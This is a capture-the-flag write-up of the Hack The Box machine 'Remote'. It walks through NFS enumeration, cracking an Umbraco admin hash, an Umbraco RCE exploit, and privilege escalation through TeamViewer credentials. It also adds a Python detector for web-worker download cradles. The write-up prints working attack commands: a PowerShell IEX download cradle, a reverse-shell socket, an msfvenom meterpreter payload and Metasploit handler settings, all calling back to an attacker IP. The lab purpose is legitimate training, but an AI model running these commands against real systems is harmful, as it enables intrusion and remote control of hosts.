#summary

  • OS: Windows
  • Difficulty: Easy
  • Points: 20
  • Release: 21 Mar 2020
  • IP: 10.10.10.180

Bloods claimed on Remote

User Blood: enjloezz 00 days, 02 hours, 57 mins, 49 seconds.

Root Blood: qtc 00 days, 03 hours, 04 mins, 46 seconds.



#reconnaissance

| nmap

As usual, I start with nmap.

[email protected]:~/Desktop/HTB/remote$ nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180

A few seconds later I get a report:

Many interesting things, I assume. But first, I'll look at port 80.

Add a hosts entry: sudo vi /etc/hosts. By the way, here is an alias I suggest to make this faster:



#enumeration

| web

While exploring remote.htb/contact, I find a few interesting things.

First, the footer identifies the CMS as Umbraco. Second, the button probably leads to a login page for the admin area.

I haven't been able to find anything else interesting yet. Let's set this aside for now and turn to the rpcbind service from the earlier nmap report.



| nfs

I figure an nmap script is worth trying to get more out of that rpcbind.

[email protected]:~/Desktop/HTB/remote$ nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb

And I get a second nmap report:


I see a site_backups directory; let's try to mount it:

[email protected]:~/Desktop/HTB/remote$ sudo mount -t nfs remote.htb:/site_backups /mnt

And I got it.


After spending a little time on Google reading about Umbraco CMS, I pull the printable text (strings) out of Umbraco.sdf:

[email protected]:/mnt/App_Data$ strings Umbraco.sdf | grep admin

In the output I find a hash:

And crack it.

Now I know the password: baconandcheese.



#exploitation

| umbraco-rce

By the way, while studying Umbraco CMS I found a CVE for it. I think it's time to use it. I'll download the exploit along with a simple PowerShell reverse shell.

I start msfconsole in a terminal and configure it:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.19.30
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j

Where 10.10.19.30 is my IP.


I also need to start an HTTP server; that is simple to do in a second terminal:

[email protected]:~/Desktop/HTB/remote$ sudo python3 -m http.server 80


Then mini-reverse.ps1 needs to be configured with my IP and port:

$socket = new-object System.Net.Sockets.TcpClient('10.10.19.30', 4444);

and now, in a third terminal, I launch the exploit with the payload:

[email protected]:~/Desktop/HTB/remote$ sudo python3 exploit.py -u [email protected] -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.19.30/mini-reverse.ps1')"

After this, I get user.txt in msfconsole.
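From the defender's side, the chain above leaves a recognisable footprint: the IIS worker process (w3wp.exe) spawning a shell whose command line is a download cradle like the IEX ... DownloadString one used here. The following is an added example, not part of the original writeup: a small detector over constructed Sysmon-style process-creation records (the field names, scoring and sample values are my assumptions, not real telemetry from the box).

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Web worker processes that should never launch an interactive shell.
WEB_SERVER_PARENTS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Markers of in-memory download-and-execute cradles (case-insensitive).
CRADLE_PATTERNS = [
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    re.compile(r"-enc(odedcommand)?\s", re.I),
]

@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the child process image
    command_line: str   # child command line as logged

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for a suspicious event, or None if benign."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cradle_hits = sum(1 for p in CRADLE_PATTERNS if p.search(ev.command_line))
    if parent in WEB_SERVER_PARENTS and child in SHELLS:
        if cradle_hits:
            return "CRITICAL: web worker spawned shell with download cradle"
        return "HIGH: web worker spawned shell"
    if cradle_hits >= 2:  # two markers at once is rare in admin scripting
        return "MEDIUM: download cradle from non-web parent"
    return None

def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Classify every event; return (index, label) for each hit."""
    return [(i, lbl) for i, ev in enumerate(events) if (lbl := classify(ev))]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records: the first two mirror the RCE chain, the rest are normal admin noise.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", PS,
              "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.19.30/mini-reverse.ps1')"),
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile Get-ChildItem C:\\Users"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", PS, "powershell.exe Invoke-WebRequest -Uri http://intranet/update.msi -OutFile C:\\Temp\\update.msi"),
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(idx, label, "|", SAMPLE_EVENTS[idx].command_line)
```

Note that a second-stage download (like the winPEAS fetch later in this writeup) is issued from the reverse shell itself, so its parent is powershell.exe rather than w3wp.exe; the parent rule alone misses it, which is why the cradle patterns are checked independently.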



#privilege escalation

To simplify your tasks in the future, I leave this hint here:


Let's download winPEAS for enumeration,

[email protected]:~/Desktop/HTB/remote$ wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe

and generate a meterpreter shell for more comfortable work:

[email protected]:~/Desktop/HTB/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.30 LPORT=4444 -f exe > meterpreter.exe

Download both onto the server from my msfconsole session:

powershell Invoke-WebRequest -URI http://10.10.19.30/winPEAS.exe -outfile C:\Users\Public\winPEAS.exe
powershell Invoke-WebRequest -URI http://10.10.19.30/meterpreter.exe -outfile C:\Users\Public\meterpreter.exe


Now I need to reconfigure msfconsole for meterpreter,

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.19.30
msf5 exploit(multi/handler) > exploit
meterpreter > shell

and start winPEAS.

C:\windows\system32\inetsrv> C:/Users/Public/winPEAS.exe


| teamviewer

In the winPEAS output I see this tasty gift:

So it's time to extract the passwords:


Last step: connect to the server with evil-winrm and collect root.txt.



#thanks

Last modified: 17.09.2020
